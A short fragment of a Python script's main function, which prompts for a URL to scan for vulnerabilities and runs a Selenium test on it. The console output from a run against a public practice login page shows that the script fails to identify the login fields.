    url = input("Enter the URL to scan for vulnerabilities: ")
    print(f"Performing interactive Selenium test on {url}...")
    selenium_test(url)

if __name__ == "__main__":
    main()


Enter the URL to scan for vulnerabilities:    http://testphp.vulnweb.com/login.php


Performing interactive Selenium test on   http://testphp.vulnweb.com/login.php...
Page Title: login page
Could not identify username and password fields automatically.
